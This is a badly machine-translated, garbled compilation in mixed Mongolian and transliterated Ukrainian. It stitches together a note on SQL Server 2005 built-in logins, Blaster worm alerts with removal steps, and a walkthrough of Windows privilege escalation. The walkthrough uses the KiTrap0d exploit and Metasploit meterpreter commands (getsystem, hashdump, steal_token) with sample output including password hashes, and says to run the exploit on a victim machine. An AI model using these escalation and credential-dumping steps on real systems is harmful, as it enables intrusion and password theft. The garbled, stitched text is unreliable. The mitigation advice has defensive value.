Вбудованы нэвтрэлт SQL сервер 2005, BUILTIN\Администраторууд, , NT AUTHORITY\SYSTEM, са
Контейнер дээр SQL Server 2005 суулгасны дараа л Нэвтрэх z'yavlyaєtsya nabіr logіnіv scho stulyuyuyutsya автоматаар. Бүх зүйлд Shvidshe, coristuvachiv-ийн холболтын хувьд та vikoristuvatimete їх байхгүй. Тим бага биш, нөхцөл байдлыг буруутгаж, нэвтрэх талаар зарим мэдлэгээр та сайн болж чадна (жишээлбэл, таны удирдлагын нэвтрэх эрхийг санамсаргүйгээр хаасан бол).
q BUILTIN\Администраторууд (өөрөөр бол BUILTIN\Администраторууд, zalezhno v_d movi үйлдлийн систем) - Windows бүлгийн нэвтрэлт нь SQL Server системийн администраторын эрхийг автоматаар олгоно. Буцах хүндэтгэл, Ингэснээр компьютер нь домэйн руу ордог, бүлэг бүлэгт автоматаар урхинд бүлэг домэйнАдминууд(Домэйн администратор) ба энэ зэрэглэлд түгжих домэйны администраторууд SQL Server дээр бүрэн эрхтэй байж болно. Ийм нөхцөл байдал нь тэвчихийн аргагүй тул та бүхэл бүтэн нэвтрэлтийг харж болно. Гэхдээ ямар ч тохиолдолд домэйн админууд SQL серверийн өгөгдөлд хандах хандалтанд санаа зовохгүй байх болно.
q Серверийн нэр 2005MSFTEUser$ Серверийн нэр$Эвлэрүүлэн зуучлагч , Серверийн нэр 2005MSSQLUser$ Серверийн нэр$Эвлэрүүлэн зуучлагч ,Серверийн нэр 2005SQLAgentUser$ Серверийн нэр$Эвлэрүүлэн зуучлагч - qi гурван нэвтрэх Windows бүлэг podklyuchennya vіdpovіdnyh үйлчилгээнд зориулсан vykorivayutsya SQL Server 2005. Тэдэнтэй SQL Server 2005-тай ижил түвшинд kaksіs operatsії, oskolki бүх nebhіdnі эрхийг vzhe nadanі vikonuvat шаардлага байхгүй. Ховор тохиолдолд та Windows дээрх эдгээр бүлгүүдэд SQL Server үйлчилгээг ажиллуулах гэх мэт үүлэн бичлэг нэмэх шаардлагатай байж магадгүй.
q NT AUTHORITY\NETWORK SERVICE - qiєї нэрээр oblіkovogo рекорд Windows Server 2003 нь Reporting Services зэрэг ASP .NET програмуудыг ажиллуулдаг ASPNET). Энэхүү Windows нэвтрэлт нь SQL Server Reporting Services-тэй холбогдоход хэрэглэгддэг. Та мэдээллийн санд шаардлагатай эрхийг автоматаар олгоно мастер, мsdbМэдээллийн үйлчилгээ нь ялсан өгөгдөл дээр үндэслэсэн.
q NT AUTHORITY\SYSTEM - үйлдлийн системийн бүхэл бүтэн локал системийн дүрс бичлэг. Хэрэв та SQL Server үйлчилгээний роботыг локал системийн клоуд бичлэгийн нэрээр тохируулсан бол ийм нэвтрэлт ийм нөхцөлд гарч ирнэ. Үүний тулд SQL серверийн нэвтрэлтийг өөрөө өөрчилдөг гэж хэлж болно. Мэдээжийн хэрэг, энэ нэвтрэлт нь SQL Server системийн администраторын эрхтэй.
q са (vіd СистемАдминистратор) - түгжих зориулалттай SQL серверийн цорын ганц нэвтрэх төрөл. Та SQL Server системийн администраторын эрхтэй бөгөөд шинийн эрхийг өөрчлөх боломжгүй. Та ижил нэвтрэхийг харах боломжгүй. Проте йог өөрчлөх эсвэл дуугүй болгох боломжтой. SQL Server 2005-ийн хувьд зөвхөн нэвтрэлт танилтыг тохируулах болно Windows, серверт холбогдохын тулд энэ нэвтрэлтийг хожихын тулд түүн рүү орох хэрэггүй.
АНХААР!!! АНХААР!!! АНХААР!!!
АЮУЛГҮЙ WORM!Шинж тэмдэг:Хэмжээнд ажиллаж байхдаа мөнгө хэмнэхийн тулд бүх хөтөлбөрийг дуусгах шаардлагатай хүмүүсийн талаар танд сануулдаг хурдан мессеж байдаг. 60 секундын дараа. дахин ахиц дэвшил гарах болно.
Оношлогоо: W32.Blaster.worm.Worm Exploiter нь RPC DCOM үйлчилгээнд 16 хулдаас олсон бөгөөд энэ нь бүгдэд нь байдаг. үйлдлийн системүүд Windows 2000, Windows XP болон Windows 2003-ийн гэр бүлүүд. Энэ зөрчил нь буферийн халилт бөгөөд энэ нь бид халдлагад өртөж буй компьютерийн 135, 139, 445-р порт дээр ирэх TCP/IP пакетийг нугалах болно гэсэн үг юм. Энэ нь дор хаяж DoS халдлага хийхийг зөвшөөрдөг (DoS нь "Үйлчилгээнээс татгалзах", эсвэл "үйлчилгээнд байгаа" гэсэн үг бөгөөд энэ тохиолдолд - халдлагад өртөж, дахин халдлагад өртсөн компьютер), хамгийн ихдээ - халдлагад өртсөн компьютерийн санах ойд виконати хийх боломжтой. Юутэр бол-ямар код. Шинэ өт нь 135-р порт руу довтолж, амжилттай болсны дараа TFTP.exe програмыг ажиллуулж, тусламж авахын тулд өөрийн компьютер дээр ажилладаг. Муу файл. Хэрэв та coristuvachev-ийг хараад RPC үйлчилгээний талаар мэдэгдэл гарч, дараа нь дахин давуу талтай болно. Дахин залгасны дараа өт автоматаар эхэлж, 135-р нээлттэй порттой компьютерт байгаа сүлжээг компьютерээс хайж эхэлнэ. Ийм өт илэрсэн үед халдлага үйлдэх боловч эхнээсээ давтагддаг. Түүнээс гадна, дээр rozpovsyudzhennya хурдаар шүүж байна Нарази, Nezabarom worm'yak viide вирусын эсрэг компаниудын жагсаалтын эхний байранд байна.
Нүүр царай:нь hrobak хамгаалах гурван арга замыг Іsnuyut. Нэгдүгээрт, Microsoft Bulletin нь RPC-ийн цоорхойг арилгахын тулд Windows-ийн бүх өөр хувилбаруудад зориулсан засваруудыг зааж өгсөн (засварууд нь 16-аас дээш линден гарсан тул системийг байнга шинэчилдэг хүмүүст санаа зовох хэрэггүй). Өөрөөр хэлбэл, хэрэв 135-р портыг галт ханаар хаасан бол hrobak компьютерт нэвтэрч чадахгүй. Гуравдугаарт, хэт туйлширсан ертөнцийн хувьд DCOM-ийг идэвхжүүлэх нь тусалдаг (процедурыг Microsoft-ын эмхэтгэлд дэлгэрэнгүй тайлбарласан болно). Ийм байдлаар, та chrobak-ийн халдлагыг хараахан таньж амжаагүй байгаа тул та өөрийн үйлдлийн системд зориулсан засварыг Microsoft серверээс авахыг зөвлөж байна (жишээлбэл, та яараарай. Windows үйлчилгээШинэчлэлт), эс тэгвээс галт хананаас 135, 139, 445 портуудыг блоклодог. Таны компьютер аль хэдийн халдварлагдсан даруйд (мөн мэдэгдлийн харагдах байдал miltsi RPCЭнэ нь халдвар нь буруутай гэсэн үг), дараа нь DCOM-ыг унтраах шаардлагатай (арьсны довтолгооны үед дахин холбох шаардлагатай болно), дараа нь нөхөөсийг оруулах шаардлагатай. Хорхойг устгахын тулд HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yak бүртгэлийн түлхүүрээс "windows auto update"="msblast.exe" гэсэн оруулгыг устгах шаардлагатай. Та Symantec вэб сайтаас chroback арилгах процедурын тухай тайланг уншиж болно.
Одоогийн байдлаар бүх вирусны эсрэг програмууд өт харуулдаггүй - шинэчлэлтийг зогсоосны дараа л боломжтой болно.
Тиймээс та Билл авга ахын татаж авах засваруудыг хараахан зарлаагүй байна:
Энд NT 4.0 болон 2000, 2003 серверт зориулсан лайкуудын холбоосууд байна.
Шууд утгаараа өөр Metasploit-ийн өрөөг барихаас хэдхэн хоногийн өмнө олж авсан
Бид зүгээр л хэлэхээс өөр аргагүй болсон шинэ модуль. Завдяки
шинэ getsystem тушаалыг ашигласнаар эвдэрсэн систем рүү шилжих боломжтой болсон
z NT AUTHORITY\SYSTEM эрхийг булаан авч, ring0 дээр хэрэглэгчийн түвшин! Би tse - be-yakah
Windows хувилбарууд.2010 оны 9-р сарын 19-нд олон нийтэд ил болсон
NT 3.1-ээс эхлэн Windows-ын аль ч хувилбарт зориулсан давуу эрхийн шинэчлэл гарсан
1993 оны рок, шинэхэн "Симка" дуугаар төгсдөг. Exploit-db.com дээр хакер Тавис
Ormandy-г KiTrap0d задлах гарын авлага болон эмхэтгэл болгон нийтэлсэн
binarnik, zastosuvannya бэлэн байна. Анхны sploїt-г туршаад үзээрэй
алдаатай. Хэнд зориулж vdmexploit.dll болон vdmallowed.exe архивыг татаж авах шаардлагатай вэ?
хохирогч машин руу шилжүүлж, тэнд exe файлыг ажиллуулна уу. AT
зарим koristuvach vikonano дансанд байгаа эсэхээс үл хамааран үр дүн
эхлүүлэх, консол системийн coristuvacha эрх, дараа нь NT гарч ирнэ
ЭРХ МЭДЭЭ\СИСТЕМ. Баталгаажуулахын тулд та өөрийн машин дээр sploit ажиллуулж болно.
өмнө нь агуу coristuvach дор системд нэвтэрсэн байна. Эхлүүлсний дараа
sploїta vіdkryєtsya vіkno cmd.exe дээд эрх бүхий.Та юу өгөх вэ? Нөхцөл байдлыг илчлэх, аль нэгдэх нь deaky нэмэлт дамжуулан завсарлага болон
otrimu бүрхүүл дээр алсын компьютер. Энэ нь Интернетэд зориулсан zgurtuvati байг
Explorer - халдагч өөрийн гарт байгаа эрх бүхий системд нэвтрэх эрхтэй болно
Хөтөчийг гадаад төрхөөр нь эхлүүлсэн тэр koristuvach. Би зодолддоггүй, хонгор минь
ихэвчлэн администраторын эрх бүхий албан ёсны бүртгэл байх болно (користувач өөрөө буруутай), гэхдээ
яаж болохгүй гэж? Тэнхлэг энд байгаа бөгөөд та давуу эрхээ нэмэгдүүлэхийн тулд KiTrap0d ашиглаж болно
NT AUTHORITY\SYSTEM руу! Түүнээс гадна navit tі koristuvachі, yakі бүлэгт орно
администратор системийн дээд хэсэгт хүрч чадахгүй, жишээлбэл,
Користувачив дахь нууц үгийн хэшийг унших (доороос үзнэ үү). Мөн NT системийн данс -
магадгүй! Үүний зэрэгцээ, нийтлэлийг хэвлэн нийтлэх үед хажуу талаас ижил нөхөөс
Мөргөлдөөнийг таслан зогсоож буй Майкрософтыг гаргасангүй."Системийг хадгалах" ажиллагаа
Бид анхны эв нэгдлийг dii-д харуулахгүй, учир нь 25
Одоо Metasploit-д шинэ скрипт нэмэгдлээ
KiTrap0d илүү тохиромжтой болсон. Модулиудын суурь дээр маш их мөнгө зарцуулсан, buv-ийн хувилбар
тогтворгүй, spratsovuvav zavzhd биш, харин өдөр нь уучлал були шиг өнгөрөөгүй байна
сорсон. Үүний зэрэгцээ модулийг бусад шинэчлэлтүүдийн хамт нэг дор татаж авдаг.
Тиймээс суулгахын тулд "Metasploit update" цэсийн зүйлийг сонгоход хангалттай.
Одоо алсын системд нэвтрэх боломжтой болсон тул "run kitrap0d" гэж бичээд авчрах боломжтой
диу дээр жагсаал. "Гэхдээ нэг удаа ийм пянка илгээсэн бол бид танд үүнийг хийж чадна
тусгай баг" гэж Metasploit жижиглэнгийн худалдаачид бодов. Үүний үр дүнд
Энэ нь ийм гайхамшигт тушаал байсан "эрх ямба олгох", дамжуулан боломжтой
meterpreter өргөтгөл - бидэнд хэрэгтэй :).Otzhe, бид алсын системд хандах боломжтой (судалгааны өгзөг
"Аврора ажиллагаа" нийтлэл) ашигласан бөгөөд биднийг консол дээр мэддэг
метасплоит. Бид эрхээ хэрхэн зохицуулж байгаа талаар сонирхоцгооё:meterpreter > getuid
Тиймээ гайхалтай coristuvach. Группээс өмнө бүлэгт орох боломжтой
администраторууд, гэхдээ бидэнд хамаагүй. Хэрэгжүүлсэн залгаас модуль
бидний хувьд getsystem баг
баталгаажуулах дэлгэц:meterpreter > priv ашиглах
Priv өргөтгөлийг ачаалж байна... амжилттай.
meterpreter > getsystem -h
Хэрэглээ: getsystem
Төрөл бүрийн системээс авсан давуу эрхэнд хүрэхийн тулд уйлна.
СОНГОЛТ:H Тусламжийн баннер.
-t Wink технологи. (Өгөгдмөл нь "0").
0: Бүх техник боломжтой
1: Үйлчилгээ - Нэрлэсэн хоолойн дүр төрх (санах ойд/админ)
2: Үйлчилгээ - Нэрлэсэн хоолойн дүр төрх (Дусаагуур/Админ)
3: Үйлчилгээ - Токен хуулбар (Санах ойд/Админ)
4: Exploit - KiTrap0D (Санах ойд/Хэрэглэгч)Таны харж байгаагаар KiTrap0D нь командын функцийн зөвхөн хэсгийг л хэрэгжүүлдэг.
Та coristuvachem-аас бүрхүүлээс хэрхэн холдсон бэ, энэ нь аль хэдийн зөв байж болох юм
админ, тэгвэл та ялах боломжтой
өөр гурван техник (та -t солихыг зөвшөөрч болно). Тэгээд хэлэхгүйгээр өөр яах билээ
ижил параметрүүдтэй холбоотойгоор бид метасплоитыг санал болгож байна, аль нь ялах боломжтой
мөргөлчдийн нэг болоорой. Нэмж дурдахад KiTrap0D, энэ нь бидний давуу эрхийг тэгшитгэх болно
"Систем", зарим эрхээр ч гэсэн бидэнд нэг дор өгсөн.meterpreter > getsystem
... системтэй болсон (4-р техникээр).Тийм ээ, тэд давуу эрх сурталчлах амжилтын талаархи мэдээллийг, үүнээс гадна халдлагад зориулж авсан
vikoristovuvavsya KiTrap0D өөрөө - магадгүй энэ нь тэргүүлэх ач холбогдолтой юм. Чи ми дино
системд орсон уу? Одоогийн UID-ээ дахин авч үзье:meterpreter > getuid
Є! Metasploit консол дахь зөвхөн нэг тушаал болон NT AUTHORITY\SYSTEM зөвшөөрөл
гэдэс дотор бид. Дали vzagali юм шиг санагдаж байна, бүх зүйл боломжтой. Би таамаглахад би таамаглаж байна
Сэтгүүлийг гаргах үед Microsoft-ын засварыг ашиглах боломжгүй байсан.Нууц үг хаях
Хэрэв та аль хэдийн систем oblіkovogo бүртгэлд хандах байгаа бол, дараа нь та хэрэгтэй
корисне. Metasploit-ийн зэвсэглэлд hashdump команд байдаг.
pwdump хэрэгслийн илүү том хувилбарыг байршуулсан. Түүнээс гадна бусад хэсэгт
скрипт хувилбарын хувиргалтуудын оруулгуудын метасплоит хувилбар бөгөөд энэ нь
LANMAN/NTLM хэш болон докуудыг илрүүлэх зарчмыг сайжруулсан нь илрээгүй
вирусны эсрэг. Ale sens tsoma-д байхгүй. Чухал, viconan нь hashdump тушаал гэж юу вэ
NT AUTHORITY\SYSTEM эрх шаардлагатай. Эс бөгөөс хөтөлбөрт өршөөл үзүүлэх болно
"[-] priv_passwd_get_sam_hashes: Үйлдэл амжилтгүй болсон: 87". Надад тэгж санагдаж байна
LANMAN/NTLM-хэшүүд нууц үгийн тусгай бүртгэлийн түлхүүрүүдэд хэрхэн хадгалагддаг
HKEY_LOCAL_MACHINE\SAM болон HKEY_LOCAL_MACHINE\SECURITY боломжгүй тул
админууд. Їх нь зөвхөн системийн oblіkovogo бичлэгийн давуу эрхээр уншиж болно.
Үүнийг хийхийн тулд hashdump командыг харна уу
орон нутгийн vytyagti z бүртгэлийн хэш биш, obov'yazykovo. Але якчо така
mozhlivist є, яагаад тийм биш гэж?meterpreter > getuid
Серверийн хэрэглэгчийн нэр: NT AUTHORITY\SYSTEMmeterpreter > hashdump-г ажиллуул
[*] Ачаалах түлхүүрийг авч байна...
[*] SYSKEY 3ed7 ашиглан hboot түлхүүрийг тооцоолж байна[...]
[*] Хэрэглэгчийн жагсаалт болон түлхүүрүүдийг авах...
[*] Хэрэглэгчийн түлхүүрүүдийг тайлж байна...
[*] Нууц үгийн хэшийг устгаж байна...Админ:500:aad3b435b51404eeaad3b435b51404ee:...
Зочин:501:aad3b435b51404eeaad3b435b51404ee:...
Туслах туслах:1000:ce909bd50f46021bf4aa40680422f646:...Хэш устгасан. Би харгис хэрцгий байдлаас гарахыг хичээхээс залхаж байна, жишээлбэл,
l0phtcrack.Хэрхэн давуу эрхээ эргүүлэх вэ?
Хэрэв би агуу хүмүүсийн баруун тийш эргэхийг оролдвол инээдтэй нөхцөл байдал үүссэн
буцаж. Олсон тушаал rev2self ажиллахгүй байсан, би аль хэдийн байна
"NT AUTHORITY\SYSTEM"-г орхих нь: робот гурвалсанд танигдахгүй байж магадгүй
getsystem-д хэрэгжсэн бусад аргууд. Эргэсэн бололтой
давуу эрх олгохын тулд Тим Користувачийн эхлүүлсэн үйл явцын жетоныг "хусах" шаардлагатай.
бидэнд хэрэгтэй. Тиймээс бүх процессыг ps командаар харуулж, тэдгээрээс сонгоно
тохиромжтой:хэмжигч > ps
Процессын жагсаалт
============
PID нэр Arch хэрэглэгчийн зам
--- ---- ---- ---- ----
0
4 Систем x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\хэрэглэгч C:\WINDOWS\Explorer.EXE
...Yak mi bachimo, explorer.exe yakraz pіd zvuchaynym koristuvacham-г эхлүүлэв.
данс ба PID=1560 болно. Одоо, за, та ашиглан "жетон хулгайлж" болно
хулгайлах_токен тушаал. PID-ээр дамжуулсан цорын ганц параметрийн хувьд
шаардлагатай үйл явц:meterpreter > steal_token 1558
Хулгайлагдсан токен хэрэглэгчийн нэр: WINXPSP3\user
meterpreter > getuid
Серверийн хэрэглэгчийн нэр: WINXPSP3\хэрэглэгч"Серверийн хэрэглэгчийн нэр" талбар дээр үндэслэн үйл ажиллагаа амжилттай болсон.
Та яаж ажилладаг вэ?
Nasamkinets varto razpovіsti гадаад төрхийн өмнө үүссэн хэрүүл маргааны мөн чанарын тухай
жагсаал. Системийн obrobnik-д өршөөлийн бурууг буруутгахыг хамгаалах завсарлага
#GP дахин эхлүүлэх (үүнийг nt!KiTrap гэж нэрлэдэг). Үндсэн давуу эрхээр дамжуулан
викон байж болно нэмэлт код. Энэ нь системээс хамаарна
Хэрэв 32 битийн x86 платформ дээр байгаа бол BIOS-ийн викиг буруу буулгаж байна
16 битийн програм ялна. Үйл ажиллагааны хувьд
Үйлдлийг удирдах 16 битийн програм (%windir% \twunk_16.exe)
эхлүүлэхийн тулд NtVdmControl() функцийг дууддаг системийн бүтэц
Өмнөх үйлдлийн үр дүнд Windows Virtual DOS машин (NTVDM дэд систем гэх мэт).
manipulyatsii системийн дахин тохируулах нь долоо хоног тутмын robnik авчрах #GP гэж
spratsovuvannya sploїtu. Илтгэлийн өмнө одод хашгирч, нэгдмэл газар байна
sploїta нь 32 битийн систем дээр бага spratsovuє юм. 64 битийн хувьд
16 битийн нэмэлтүүдийг ажиллуулах үйлдлийн эмуляторууд ердөө л байдаггүй.Сплоїтом бэлтгэхтэй холбоотой мэдээлэл яагаад олон нийтэд цацагдсан бэ? Оршихуйн тухай
үл нийцэх, sploїta зохиогч өнгөрсөн хувь заяаны cob дээр Microsoft мэдээлсэн болон
navіt otrimav podtverdzhennya, scho його zvіt Bulo харж өмнө хүлээн зөвшөөрсөн. Зөвхөн виз
мөн тэнд байхгүй. Компанийн хувьд албан ёсны нөхөөс байхгүй байсан бөгөөд зохиогч нь буруу байсан
аль нь зөв, хамгийн сайн нь тэр дагуу мэдээллийг олон нийтэд нийтлэх. гайхах,
сэтгүүл худалдаанд гарч байсан тэр үеийн chi viide patch :)?Хэрхэн хуваагдалдаа өөрийгөө хамгаалах вэ
Уусмалыг сайжруулахын тулд бүрэн засварын хэлтэрхий хараахан олдоогүй байна.
тойрч гарах замыг хурдасгах тохиолдол гардаг. Сүүлийн сонголт -
MSDOS болон WOWEXEC дэд системийг идэвхжүүлэх нь нэн даруй тархахад тусална
функциональ, учир нь NtVdmControl() функцийг дуудах боломжгүй болсон
NTVDM системийг эхлүүлэх. Windows-ийн хуучин хувилбаруудын хувьд үүнийг дамжуулан хэрэгжүүлэх ёстой
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW-г мэдэх шаардлагатай бүртгэл.
і нэрэнд дурын тэмдэгт нэмнэ үү. Одоогийн үйлдлийн системийн хувьд
16 битийн програмуудыг эхлүүлэхийн тулд солилцоог суулгах шаардлагатай
бүлгийн бодлого. Бид GPEDIT.MSC гэж нэрлэдэг хүмүүсийн хувьд түгээлт рүүгээ орцгооё
"Koristuvach тохиргоо/захиргааны загварууд/Windows бүрэлдэхүүн хэсэг/хураангуй
нэмэх" болон "16 бит хүртэл нэвтрэх хашаа" сонголтыг идэвхжүүлнэ
Додаткив".www
Зохиогчийн хуйвалдааны хачирхалтай байдлын тодорхойлолт:
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.htmlМайкрософттой холбоотой асуудлуудыг цаг тухайд нь засах шийдэл:
http://support.microsoft.com/kb/979682АНХААРУУЛГА
Мэдээллийг олон нийтийн зорилгоор танилцуулж байна. Wikimedia її in
хууль бус зорилго нь эрүүгийн хариуцлага хүлээхэд хүргэдэг.NT эрх мэдэл/системийн алдаа,
podomlennya XP - вирусыг хэрхэн устгахХэрэв танд орос хувилбар байгаа бол эхлээд хэлээ татаж аваад хэлээ өөрчил.
Вирусын тухай Trochs:
Uchora, Москвад ойролцоогоор 23 жилийн дараа янз бүрийн форумд Мережа руу нэвтрэх үед Windows 2000 болон Windows XP-ийн гайхалтай зан байдлын талаар мэдээллүүд гарч эхэлсэн: систем нь RPC үйлчилгээг өршөөж, дахин давуу эрх олгох шаардлагатай гэсэн мэдэгдлийг олж харсан. Шинэчлэлтийг шинэчилсний дараа давталт нь хамгийн ихдээ whilin-ийн спратаар давтагдсан бөгөөд төгсгөлгүй байв.Өнөөдрөөс эхэлсэн w32.Blaster.worm хэмээх шинэ хорхойн тархалт бүхэлдээ тахлын шалтгаан болж байгааг хийсэн судалгаа харуулжээ. , бид дараагийн дарааллаар дуудах үед бид халдлагад өртсөн компьютерийн 135, 139 эсвэл 445 порт руу илгээгдсэн TCP / IP пакетийг нэгтгэх болно. Энэ нь дор хаяж DoS халдлага хийхийг зөвшөөрдөг (DoS нь "Үйлчилгээнээс татгалзах", эсвэл "үйлчилгээнд байгаа" гэсэн үг бөгөөд энэ тохиолдолд - халдлагад өртөж, дахин халдлагад өртсөн компьютер), хамгийн ихдээ - халдлагад өртсөн компьютерийн санах ойд виконати хийх боломжтой. Юутер бол-ямар код.
Нэгдүгээрт, өт гарч ирэхээс өмнө хил хязгаарын бөөгнөрөл нь эвгүй байдалд ордог - бүр илүү энгийн мөлжлөгийн илэрхий байдал (ялагчийн үл нийцэх хөтөлбөрүүд), хэрэв та хөтөлбөрөө аваад аль болох богино хугацаанд эхлэх боломжтой бол нөхцөл байдлыг бий болгохыг уриал. боломжтой энх тайвны зорилго. Гэсэн хэдий ч ишлэлүүд байсан.
Шинэ өт нь 135-р порт руу өргөтгөсөн довтолгоотой бөгөөд амжилттай болсныхоо дараа TFTP.exe програмыг ажиллуулж, түүний тусламжтайгаар компьютерийг файл руугаа халдахад хүргэдэг. Хэрэв та coristuvachev-ийг хараад RPC үйлчилгээний талаар мэдэгдэл гарч, дараа нь дахин давуу талтай болно. Дахин залгасны дараа өт автоматаар эхэлж, 135-р нээлттэй порттой компьютерт байгаа сүлжээг компьютерээс хайж эхэлнэ. Ийм өт илэрсэн үед халдлага үйлдэх боловч эхнээсээ давтагддаг. Түүгээр ч барахгүй халдварын тархалтын хурдыг харгалзан үзэхэд хорхой нь вирусын эсрэг компаниудын жагсаалтад хамгийн түрүүнд гарч ирдэг.
нь hrobak хамгаалах гурван арга замыг Іsnuyut.
Нэгдүгээрт, Microsoft Bulletin нь RPC-ийн цоорхойг арилгахын тулд Windows-ийн бүх өөр хувилбаруудад зориулсан засваруудыг зааж өгсөн (засварууд нь 16-аас дээш линден гарсан тул системийг байнга шинэчилдэг хүмүүст санаа зовох хэрэггүй).
Өөрөөр хэлбэл, 135-р портыг галт ханаар хаасан бол hrobak нь компьютерт нэвтэрч чадахгүй.
Гуравдугаарт, хэт туйлширсан ертөнцийн хувьд DCOM-ийг идэвхжүүлэх нь тусалдаг (процедурыг Microsoft-ын эмхэтгэлд дэлгэрэнгүй тайлбарласан болно). Ийм байдлаар бид өтний халдлагыг таниагүй хэвээр байна - Microsoft серверээс үйлдлийн системийнхээ нөхөөсийг авахыг зөвлөж байна (жишээлбэл, Windows Update үйлчилгээг ашиглах), эсвэл 135, 139, 445 портуудыг блоклохыг зөвлөж байна. галт хананаас.
Хэрэв таны компьютер аль хэдийн халдвар авсан бол (мөн RPC өршөөлийн тухай мэдэгдэл гарч ирэх нь халдвар нь буруутай гэсэн үг юм) DCOM-ийг унтраах шаардлагатай (арьсны халдлага гарсан тохиолдолд товшилт гарч ирэх болно. дахин хавсаргах), шаардлагатай бол нөхөөсийг хамгаалж, суулгана.
Буцах ажиллагааг зогсоохын тулд та HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr бүртгэлийн түлхүүрийг устгах хэрэгтэй.
msblast.exe файлыг юу устгахыг мэдэхийн тулд "windows auto update"="msblast.exe" гэсэн entVersion\Run оруулга - chrobak-ийн нэр. Та Symantec вэб сайтаас chroback арилгах процедурын тухай тайланг уншиж болно.Одоогийн байдлаар бүх вирусны эсрэг програмууд өт харуулдаггүй - шинэчлэлтийг зогсоосны дараа л боломжтой болно.
2003 оны 17-08-ны өдрийн 23:29 цагт AHTOH нийтэлсэн:АЮУЛГҮЙ WORM! Nt Authority/Системийн алдаа
__________________
Эвдрэл
Би сайн сайхныг авчирдаг, би хор хөнөөлийг авчирдаг ...
